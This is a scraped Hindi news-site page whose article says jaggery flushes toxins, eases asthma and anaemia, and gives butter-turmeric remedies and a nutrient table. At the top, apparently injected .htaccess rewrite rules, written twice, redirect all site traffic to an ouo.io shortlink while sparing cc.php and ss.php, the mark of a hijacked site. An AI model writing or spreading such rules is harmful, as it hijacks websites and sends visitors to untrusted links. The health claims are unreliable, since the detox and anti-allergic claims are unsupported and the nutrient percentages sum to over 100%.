
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 278
शरीर से टॉक्सिन्स को बाहर निकालता है गुड़
सर्दियों के मौसम की शुरुआत होते ही प्रदूषण का प्रकोप बढ़ने लगता है। इसकी वजह से कई लोगों में अस्थमा, ब्रॉन्काइटिस, पल्मोनरी डिजीज और बच्चों में निमोनिया का खतरा बढ़ जाता है। प्रदूषण से निपटने में घरों में आमतौर पर उपलब्ध रहने वाला गुड़ काफी मददगार हो सकता है। दरअसल, गुड़ प्राकृतिक रूप से शरीर से टॉक्सिन्स को बाहर निकालता है और गंदगी को साफकरता है। गुड़ भारतीय खानपान का हिस्सा रहा है। काफी लोग खाना खाने के बाद गुड़ जरूर खाते हैं, क्योंकि यह पाचन मेंमदद करता है। साथ ही शरीर का मेटाबॉलिज्म ठीक रखता है। गुड़ अस्थमा के रोगियों के लिए फायदेमंद है क्योंकि इसमें ऐंटी-ऐलर्जिक गुण होते हैं।
एक चम्मच मक्खन में थोड़ा सा गुड़ और हल्दी मिला लें और दिन में 3-4 बार इसका सेवन करें। यह शरीर में मौजूद जहरीले तत्वको बाहर निकालेगा और उसे टॉक्सिन फ्री बनाएगा। गुड़ को सरसों तेल में मिलाकर खाने से सांस से जुड़ी दिक्कतों से आराममिलता है।
गुड़ में पोषक तत्व
सुक्रोज 59.7%
ग्लूकोज 21.8%
खनिज तरल 26%
जल अंश 8.86%
एनीमिया के मरीजों को दी जाती है गुड़ खाने की सलाह
गुड़ में कैल्शियम, फास्फोरस, आयरन और कॉपर भी अच्छी मात्रा में मिलते हैं। गुड़ आयरन का प्रमुख स्रोत है और एनीमिया केमरीजों को भी इसके सेवन की सलाह दी जाती है।